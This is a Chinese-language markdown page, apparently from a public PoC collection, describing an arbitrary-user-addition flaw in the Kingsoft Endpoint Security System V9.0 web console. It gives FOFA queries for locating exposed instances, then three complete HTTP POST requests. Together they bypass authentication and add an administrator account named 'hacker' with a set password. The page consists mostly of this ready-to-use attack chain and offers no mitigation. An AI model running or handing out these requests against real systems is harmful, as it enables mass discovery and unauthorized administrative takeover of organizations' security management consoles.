Skip to content

Latest commit

 

History

History
78 lines (60 loc) · 3.06 KB

金山终端安全系统V9.0任意用户添加漏洞.md

File metadata and controls

78 lines (60 loc) · 3.06 KB

金山终端安全系统V9.0任意用户添加漏洞

fofa

title=="用户登录-猎鹰终端安全系统V9.0Web控制台" 
app="金山终端安全系统V9.0Web控制台"

poc

首先访问 checklogin.php,设置$_SESSION[‘userName’]。(后续的 Cookie 保持不变)

POST /inter/ajax.php?imd=checklogin HTTP/1.1
Host: 192.168.20.131:6868
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://192.168.20.131:6868
Connection: close
Referer: http://192.168.20.131:6868/
Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

uname=login_session_

img

接下来访问 send_verify2email.php 在 redis 中添加一个键值对:(mailTo 符合邮箱格式即可)

POST /inter/ajax.php?imd=send_verify2email HTTP/1.1
Host: 192.168.20.131:6868
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://192.168.20.131:6868
Connection: close
Referer: http://192.168.20.131:6868/
Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964 
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

mailTo=login_session_@qq.comEmail

image-20241230155135464

面两个步骤访问完成之后,即可未授权访问系统的所有功能,接下来通过权限校验,添加一个系统管理员,访问 get_user_login_cmd 文件即可。(userSession 需要设置成 Email,密码为 1qaz@WSX)

POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: 192.168.20.131:6868
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest
Content-Length: 285
Origin: http://192.168.20.131:6868
Connection: close
Referer: http://192.168.20.131:6868/
Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964

{"add_user_info_cmd":{"userSession":"Email","mode_id":"B666A8CD-2247-2CA8-4F7D-29EB058A27C2","real_name":"","user_name":"hacker","type":"分级管理员","tel":"","mobile":"","corp":"","notice":"","psw":"92d7ddd2a010c59511dc2905b7e14f64","email":"","VHierarchyName":"","orgtype":"1"}}

img

img

漏洞来源